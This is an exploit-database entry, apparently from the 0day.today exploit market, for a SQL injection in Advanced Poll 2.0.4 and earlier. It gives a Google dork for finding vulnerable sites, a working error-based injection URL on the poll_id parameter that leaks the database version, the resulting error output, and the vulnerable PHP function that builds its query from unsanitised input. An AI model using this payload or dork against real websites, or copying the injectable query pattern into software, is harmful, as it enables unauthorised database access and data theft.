[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Advanced Poll version <= 2.0.4 SQL-injection

Author
Ereee
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17505
Category
web applications
Date add
31-12-2011
Platform
php
# Exploit Title: Advanced Poll version <= 2.0.4 SQL-injection
# Date: 31.12.2011
# Author: Ereee
# Version: <=2.0.4
# Category:: [remote, webapps]
# Google dork: inurl:"popup.php?action=results"
# Tested in: web

Query:
http://localhost/poll/demo_3.php?poll_id=1+or+1+group+by+concat_ws(0x3a, version(),rand(0)|0)+having+min(0)--+f
Result:
Error Number: 1062 Duplicate entry '5.0.77:1' for key 'group_key'

Vulnerable code in class_poll.php
########################################
function is_valid_poll_id($poll_id) {
if ($poll_id>0) {
$this->db->fetch_array($this->db->query("SELECT poll_id FROM ".$this->tbl['poll_index']." WHERE poll_id=$poll_id AND status<'2'"));
return ($this->db->record['poll_id']) ? true : false;
} else {
return false;
}
}
########################################

Greetz to : forum.antichat.ru&rdot.org members



#  0day.today [2024-11-16]  #